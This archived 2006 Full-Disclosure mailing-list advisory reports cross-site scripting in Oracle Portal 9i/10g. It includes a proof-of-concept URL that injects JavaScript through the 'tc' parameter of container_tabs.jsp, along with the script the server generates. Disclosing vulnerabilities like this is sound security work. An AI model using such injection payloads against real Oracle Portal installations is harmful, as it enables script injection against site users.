Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [Full-disclosure] Oracle Applications/Portal 9i/10g Cross Site Scripting |
|---|---|
| Date: | Fri, 22 Dec 2006 08:30:42 +0000 |
Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may found in any version:
http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//
The following code will be generated:
---SNIPPED---
<script language=javascript>
top.null =
null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',
'null');//.render(window);
</script>
---SNIPPED---
Solution
------------
There is no solution. As a workaround, enable mod_security if it's not.
Otherwise wait 6 months/1 year for a patch from Oracle Corp.
_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con
MSN Entretenimiento. http://entretenimiento.msn.es/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting, putosoft softputo |
|---|---|
| Next by Date: | Xt-News 0.1 : SQL Injection Vulnerability & XSS, mr_kaliman |
| Previous by Thread: | Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting, putosoft softputo |
| Next by Thread: | Xt-News 0.1 : SQL Injection Vulnerability & XSS, mr_kaliman |
| Indexes: | [Date] [Thread] [Top] [All Lists] |